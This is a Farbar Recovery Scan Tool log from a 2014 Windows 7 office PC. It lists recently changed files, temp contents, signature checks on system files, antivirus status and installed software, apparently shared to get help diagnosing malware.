2014-08-06 03:00 - 2014-06-06 15:51 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-08-06 03:00 - 2014-06-06 15:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-08-06 03:00 - 2014-06-05 07:45 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-08-06 03:00 - 2014-06-05 07:26 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2014-08-06 03:00 - 2014-06-05 07:25 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-08-06 03:00 - 2014-04-11 19:22 - 00155072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-08-06 03:00 - 2014-04-11 19:22 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2014-08-06 03:00 - 2014-04-11 19:19 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2014-08-06 03:00 - 2014-04-11 19:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2014-08-06 03:00 - 2014-04-11 19:19 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2014-08-06 03:00 - 2014-04-11 19:19 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-08-06 03:00 - 2014-03-04 02:43 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-28 14:19 - 2014-08-28 14:19 - 00015266 _____ () C:\Users\mike\Desktop\FRST.txt
2014-08-28 14:19 - 2014-08-28 14:18 - 00000000 ____D () C:\FRST
2014-08-28 14:18 - 2014-08-28 14:18 - 02103296 _____ (Farbar) C:\Users\mike\Desktop\FRST64.exe
2014-08-28 14:16 - 2014-08-28 14:16 - 00415232 _____ (Farbar) C:\Users\mike\Desktop\FSS.exe
2014-08-28 14:01 - 2014-08-28 13:58 - 00015759 _____ () C:\Users\mike\Desktop\attach.txt
2014-08-28 14:01 - 2013-02-11 20:05 - 01470582 _____ () C:\Windows\WindowsUpdate.log
2014-08-28 14:00 - 2014-08-28 13:58 - 00018738 _____ () C:\Users\mike\Desktop\dds.txt
2014-08-28 13:53 - 2014-01-09 12:48 - 00000636 _____ () C:\Windows\Tasks\TSOLnkUpdAlertTask.job
2014-08-28 13:51 - 2014-08-27 14:54 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Raptr
2014-08-28 13:51 - 2014-02-21 13:38 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Spotify
2014-08-28 13:51 - 2013-04-29 10:25 - 00000856 __RSH () C:\Users\mike\ntuser.pol
2014-08-28 13:51 - 2013-04-29 10:25 - 00000000 ____D () C:\Users\mike
2014-08-28 13:50 - 2013-04-12 14:32 - 00000112 _____ () C:\Windows\system32\config\netlogon.ftl
2014-08-28 13:46 - 2014-08-28 13:46 - 00688992 ____R (Swearware) C:\Users\mike\Desktop\dds.com
2014-08-28 12:33 - 2013-04-12 16:22 - 00000000 ____D () C:\Quote
2014-08-28 10:31 - 2014-08-28 10:31 - 00000000 ____D () C:\Users\mike\Desktop\ProcessExplorer
2014-08-28 10:29 - 2014-08-28 10:29 - 01187960 _____ () C:\Users\mike\Desktop\ProcessExplorer.zip
2014-08-28 07:23 - 2009-07-13 21:45 - 00021088 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-28 07:23 - 2009-07-13 21:45 - 00021088 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-28 07:06 - 2014-02-21 13:39 - 00000000 ____D () C:\Users\mike\AppData\Local\Spotify
2014-08-28 07:05 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-28 07:05 - 2009-07-13 21:51 - 00039406 _____ () C:\Windows\setupact.log
2014-08-27 19:57 - 2013-08-20 12:08 - 00000000 ____D () C:\Users\mike\AppData\Local\ESET
2014-08-27 16:25 - 2014-08-27 16:25 - 00000000 ____D () C:\ProgramData\ATI
2014-08-27 16:23 - 2014-08-27 16:23 - 00000000 ____D () C:\Program Files\AMD
2014-08-27 15:09 - 2014-08-27 15:04 - 00000059 _____ () C:\Windows\LTDLGFILE14N.INI
2014-08-27 15:05 - 2014-08-27 15:05 - 00000026 _____ () C:\Windows\cur
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\library_dir
2014-08-27 14:55 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\Raptr
2014-08-27 14:54 - 2014-08-27 14:54 - 00061828 _____ () C:\Windows\SysWOW64\CCCInstall_201408271454457815.log
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\AMD
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\Common Files\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\AMD AVT
2014-08-27 14:54 - 2014-08-27 14:53 - 00000000 ____D () C:\ProgramData\Package Cache
2014-08-27 14:54 - 2014-08-27 14:53 - 00000000 ____D () C:\Program Files\ATI Technologies
2014-08-27 14:52 - 2014-08-27 14:52 - 00000000 ____D () C:\AMD
2014-08-27 14:36 - 2009-07-13 22:13 - 00786558 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-27 14:27 - 2014-08-27 14:51 - 269338400 _____ (AMD Inc.) C:\Users\networkadmin\Desktop\14-4-win7-win8-win8.1-64-dd-ccc-whql.exe
2014-08-27 13:33 - 2014-08-27 13:33 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Adobe
2014-08-27 13:29 - 2014-08-27 13:29 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Dell
2014-08-27 13:29 - 2014-08-27 13:21 - 211706272 _____ (Dell Inc.) C:\Users\networkadmin\Downloads\Video_Driver_HCTV5_WN32_8.922_A00.EXE
2014-08-27 13:20 - 2014-08-27 13:03 - 00000000 ____D () C:\temp
2014-08-27 13:07 - 2014-08-27 13:06 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PCDr
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\My Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-08-27 13:06 - 2013-02-11 20:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 13:03 - 2014-08-27 13:03 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\PCDr
2014-08-27 13:03 - 2013-08-22 10:52 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Deployment
2014-08-27 13:02 - 2014-08-27 13:02 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 13:00 - 2013-02-11 20:07 - 00699568 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-08-27 13:00 - 2013-02-11 20:07 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-08-27 12:07 - 2014-08-27 11:50 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-27 11:31 - 2014-08-27 11:31 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Toshiba
2014-08-27 11:27 - 2014-08-27 11:27 - 00377984 _____ () C:\Windows\Minidump\082714-28298-01.dmp
2014-08-27 11:27 - 2013-06-24 16:07 - 539952258 _____ () C:\Windows\MEMORY.DMP
2014-08-27 11:27 - 2013-06-24 16:07 - 00000000 ____D () C:\Windows\Minidump
2014-08-27 11:07 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Toshiba
2014-08-27 11:06 - 2014-08-27 11:06 - 00447224 _____ () C:\Windows\Minidump\082714-26130-01.dmp
2014-08-27 11:03 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\LiveKernelReports
2014-08-21 09:37 - 2014-08-21 09:37 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Toshiba
2014-08-21 09:37 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Toshiba
2014-08-21 09:36 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba
2014-08-21 09:36 - 2013-02-11 20:23 - 00000000 ____D () C:\Windows\Downloaded Installations
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jabra
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Toshiba
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Plantronics
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Jabra
2014-08-21 09:34 - 2014-08-21 09:34 - 00087328 _____ () C:\Users\teleco3\AppData\Local\GDIPFONTCACHEV1.DAT
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Macromedia
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Intel Corporation
2014-08-21 09:34 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Adobe
2014-08-21 09:33 - 2014-08-21 09:33 - 00001411 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Adobe
2014-08-21 09:33 - 2014-08-21 09:32 - 00001445 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-08-21 09:33 - 2009-07-13 21:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-08-21 09:32 - 2014-08-21 09:32 - 00000020 ___SH () C:\Users\teleco3\ntuser.ini
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Windows Small Business Server
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3
2014-08-20 12:14 - 2014-08-20 12:14 - 00007605 _____ () C:\Users\mike\AppData\Local\Resmon.ResmonCfg
2014-08-15 13:20 - 2013-04-12 16:21 - 00000000 ____D () C:\Users\Public\QpipeWrk
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\Program Files\ESET
2014-08-13 06:56 - 2013-04-29 10:35 - 00011261 _____ () C:\Users\mike\Desktop\TIME SHEET Estimators.xlsx
2014-08-06 03:48 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-08-06 03:11 - 2009-07-13 21:45 - 00347632 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-06 03:10 - 2010-11-20 20:47 - 00252980 _____ () C:\Windows\PFRO.log
2014-08-06 03:09 - 2010-11-21 00:17 - 00000000 ____D () C:\Program Files\Windows Journal
2014-08-06 03:09 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-08-06 03:03 - 2013-04-12 15:03 - 00000000 ____D () C:\ProgramData\Microsoft Help

Some content of TEMP:
====================
C:\Users\mike\AppData\Local\Temp\ProcExp64.exe
C:\Users\networkadmin\AppData\Local\Temp\14-4-win7-win8-win8.1-64-dd-ccc-whql.exe
C:\Users\networkadmin\AppData\Local\Temp\InitBDE.exe
C:\Users\networkadmin\AppData\Local\Temp\raptrpatch.exe
C:\Users\networkadmin\AppData\Local\Temp\raptr_stub.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-08-27 00:18

==================== End Of Log ============================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 25-08-2014
Ran by mike at 2014-08-28 14:19:45
Running from C:\Users\mike\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET Endpoint Antivirus 5.0 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1}
AS: ESET Endpoint Antivirus 5.0 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 13.2.1 - Hewlett-Packard) Hidden
Adobe Acrobat X Standard - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-BA7E-000000000005}) (Version: 10.1.11 - Adobe Systems)
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.176 - Adobe Systems Incorporated)
AMD Accelerated Video Transcoding (Version: 13.30.100.40417 - Advanced Micro Devices, Inc.) Hidden
AMD Catalyst Control Center (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
AMD Catalyst Install Manager (HKLM\...\{6119B3A6-3603-9695-0398-CDF2AF0A13F8}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
AMD Drag and Drop Transcoding (Version: 2.00.0000 - Advanced Micro Devices, Inc.) Hidden
AMD Wireless Display v3.0 (Version: 1.0.0.15 - Advanced Micro Devices, Inc.) Hidden
BioAPI Framework (Version: 1.0.2 - Dell Inc.) Hidden
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Standard (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Traditional (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Czech (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Danish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Dutch (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help English (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Finnish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help French (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help German (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Greek (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Hungarian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Italian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Japanese (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Korean (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Norwegian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Polish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Portuguese (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Russian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Spanish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Swedish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Thai (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Turkish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
ccc-utility64 (Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
CCMComInterface (HKLM-x32\...\{2D57AD48-76B0-4CFE-A4D2-3A23B465CC6E}) (Version: 8.00.0005 - Toshiba America Information System Inc.)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix Online Launcher (HKLM-x32\...\{3E7E6F1E-7376-475A-8BC9-E3126B20CF5F}) (Version: 1.0.198 - Citrix)
Citrix Online Launcher (HKLM-x32\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Crystal Reports 2008 Runtime SP2 (HKLM-x32\...\{C484CC8D-03CF-4022-89C4-DB4F02E8A15B}) (Version: 12.2.0.290 - Business Objects)
Custom (Version: 01.00.00.000 - Wave Systems Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5971CA1F-6BDE-498F-952C-9F2BF94070A4}) (Version:  - Microsoft)
Dell Client System Update (HKLM-x32\...\{04566294-A6B6-4462-9721-031073EB3694}) (Version: 1.3.0 - Dell Inc.)
Dell Data Protection | Access (HKLM\...\{ABBA2EA4-740E-4052-902B-9CA70B081E3F}) (Version: 2.2.00001.001 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
DellAccess (Version: 01.01.00.104 - Wave Systems Corp.) Hidden
EMBASSY Client Core (Version: 01.01.00.036 - Wave Systems Corp.) Hidden
e-Office Manager 4.0  (HKLM-x32\...\{80826A80-9322-48FD-BC20-E0E84CCDEBC1}) (Version: 4.1.0 - Harrison Publishing House/D3)
ESET Endpoint Antivirus (HKLM\...\{3187B3B0-3620-4459-A983-4403FC481420}) (Version: 5.0.2214.4 - ESET, spol. s r.o.)
Express Piping Workstation (HKLM-x32\...\Express Piping Workstation) (Version:  - Quote Software)
Gemalto (Version: 01.64.01.0010 - Wave Systems Corp) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.1.0.1055 - Citrix Online, a division of Citrix Systems, Inc.)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® IPP Run-Time Installer 7.0 for Windows (HKLM-x32\...\{84C1ACA3-C1A7-4B31-A6C1-1018A481BDFE}) (Version: 7.00.0000 - Toshiba Corp.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.20.1337 - Intel Corporation)
Intel® Network Connections 17.3.63.0 (HKLM\...\PROSetDX) (Version: 17.3.63.0 - Intel)
Intel® Network Connections 17.3.63.0 (Version: 17.3.63.0 - Intel) Hidden
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.2.0.1006 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.6.245 - Intel Corporation)
Intel® Trusted Connect Service Client (Version: 1.26.242.3 - Intel Corporation) Hidden
Jabra PC Suite 2.10.3050 (HKLM-x32\...\{4F75AE17-7642-4401-AA3B-C6A45EF55008}) (Version: 2.10.3050.0 - GN Netcom A/S)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
KIP Request 6 (HKLM-x32\...\{C0333997-7B38-416D-B69B-206CC24A9F7C}) (Version: 6.201.6549 - KIP)
Lead Tools Runtime (HKLM-x32\...\Lead Tools Runtime) (Version:  - )
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (Version: 4.5.51209 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version:  - Microsoft)
Microsoft Office 2010 Service Pack 1 (SP1) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Business 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20125.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual Basic PowerPacks 1.2 (HKLM-x32\...\{5169D2E2-0B94-3320-8C7A-718F92BE20CE}) (Version: 9.0.30729 - Microsoft)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
